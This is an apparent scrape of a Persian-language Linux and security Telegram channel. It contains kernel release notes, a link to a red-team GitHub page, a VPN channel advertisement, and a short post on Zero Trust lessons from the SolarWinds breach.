🟠 بهبود کد مربوط به خنثی سازی حفره های امنیتی مثل Meltdown و Retbleed.
🟠 بهبود سازی های زیادی در درایور های VirtIO.
🟠 بهبود سازی هایی در سیستم RNG و سرعت SPI.
🟩🟩🟩🟩🟩 باک فیکس 🟩🟩🟩🟩🟩
🟢 فیکس مشکلاتی مرتبط با کیبورد لپ تاپ هایی با پردازنده AMD Ryzen 6000
🟢 مشکلات تاچ پد و کیبرد بعد از برگشت از Suspend که برای کامپیوتر های TUXEDO و لپ تاپ های Clevo فیکس شده.
و کلی تغییرات دیگر...
منبع 1
منبع 2
منبع 3
#Kernel_News
tarball - view diff - browse
🔅@LinNews
🔅@LinAcademy
❤2👍1🎉1
Forwarded from LinSecurity (h3p)
Offensive Security | Red Team
> https://github.com/cyberkhalid/cyberkhalid.github.io
🔅@LinSecurity
🔅@LinAcademy
> https://github.com/cyberkhalid/cyberkhalid.github.io
🔅@LinSecurity
🔅@LinAcademy
GitHub
GitHub - cyberkhalid/cyberkhalid.github.io: Offensive Security | Red Team
Offensive Security | Red Team. Contribute to cyberkhalid/cyberkhalid.github.io development by creating an account on GitHub.
دوستان دسترسی به اینترنت این روزا خیلی سخت شده، چندی از همکارا یه کانال راه انداختن که یکم کار رو براتون راحت کنن، عضو شید و لذت ببرید.
https://news.1rj.ru/str/kralvpn
🔅@LinAcademy
https://news.1rj.ru/str/kralvpn
🔅@LinAcademy
👍1
Forwarded from LinSecurity (h3p)
پیامدهای یک غفلت
▪️در معماری امنیتی Zero Trust شما نمی توانید به این پنج فاکتور موجود در شکل بالا اعتماد کنید. بلکه باید صحت آنها را Verify کنید.
▪️اگر از هر کدام از این فاکتورها غفلت کنید راه نفوذ را باز کرده اید و ممکن است به سنگین ترین شکل ممکن آسیب ببینید حتی اگر اسم شرکت شما FireEye باشد!
▪️سازمانها و شرکتهایی که ضربه خوردند هیچکدام راهکار مناسبی برای Verify کردن Applicationها و Updateهای آنها نداشتند. همه آنها به SolarWinds اعتماد کرده بودند!
در مدل Zero Trust یک اصل مهم داریم:
*Never Trust, Always Verify*
پ.ن: صداسیما هم اینتوری هک میشه ☺️😉
#pingchannel https://www.nist.gov/blogs/taking-measure/zero-trust-cybersecurity-never-trust-always-verify
🔅@LinSecurity
🔅@LinAcademy
▪️در معماری امنیتی Zero Trust شما نمی توانید به این پنج فاکتور موجود در شکل بالا اعتماد کنید. بلکه باید صحت آنها را Verify کنید.
▪️اگر از هر کدام از این فاکتورها غفلت کنید راه نفوذ را باز کرده اید و ممکن است به سنگین ترین شکل ممکن آسیب ببینید حتی اگر اسم شرکت شما FireEye باشد!
▪️سازمانها و شرکتهایی که ضربه خوردند هیچکدام راهکار مناسبی برای Verify کردن Applicationها و Updateهای آنها نداشتند. همه آنها به SolarWinds اعتماد کرده بودند!
در مدل Zero Trust یک اصل مهم داریم:
*Never Trust, Always Verify*
پ.ن: صداسیما هم اینتوری هک میشه ☺️😉
#pingchannel https://www.nist.gov/blogs/taking-measure/zero-trust-cybersecurity-never-trust-always-verify
🔅@LinSecurity
🔅@LinAcademy
NIST
Zero Trust Cybersecurity: ‘Never Trust, Always Verify’
Huh? What?